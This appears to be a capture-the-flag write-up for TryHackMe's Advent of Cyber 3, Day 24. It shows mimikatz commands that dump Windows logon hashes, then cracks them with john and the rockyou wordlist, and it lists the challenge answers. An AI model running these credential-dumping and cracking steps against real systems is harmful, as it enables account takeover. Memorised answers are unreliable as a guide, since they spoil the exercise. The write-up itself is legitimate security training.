Advent Of Cyber 3 - Day 24
tl;dr:
Post exploitation
On the desktop of the deploy’ed VM, start mimikatz.exe in the x64 folder.
Verify that it works and start dumping hashes:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Grab the NTLM and SHA1 hashes and let’s play around with the NTLM hashes. Save all the found hashes in a file called hash.txt
emily: 8af326aa4850225b75c592d4ce19ccf5
administrator: 001a5b3e266374c0df96a298f7f7419f
┌──(kryssar㉿kali)-[/mnt/hgfs/VMSHARED/tryhackme/day24]
└─$ cat hash.txt
8af326aa4850225b75c592d4ce19ccf5
001a5b3e266374c0df96a298f7f7419f
then run the tool john agains the hashes to see if we can crack some of them:
john --format=NT -w=/usr/share/wordlists/rockyou.txt hash.txt --pot=output.txt
┌──(kryssar㉿kali)-[/mnt/hgfs/VMSHARED/tryhackme/day24]
└─$ john --format=NT -w=/usr/share/wordlists/rockyou.txt hash.txt --pot=output.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
1234567890 (?)
1g 0:00:00:00 DONE (2021-12-25 21:17) 1.694g/s 24311Kp/s 24311Kc/s 24311KC/s _ 09..*7¡Vamos!
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
result:
┌──(kryssar㉿kali)-[/mnt/hgfs/VMSHARED/tryhackme/day24]
└─$ cat output.txt
$NT$8af326aa4850225b75c592d4ce19ccf5:1234567890
so the user: emily has the password: 1234567890
What is the username of the other user on the system?: emily
What is the NTLM hash of this user?: 8af326aa4850225b75c592d4ce19ccf5
What is the password for this user?: 1234567890
EOF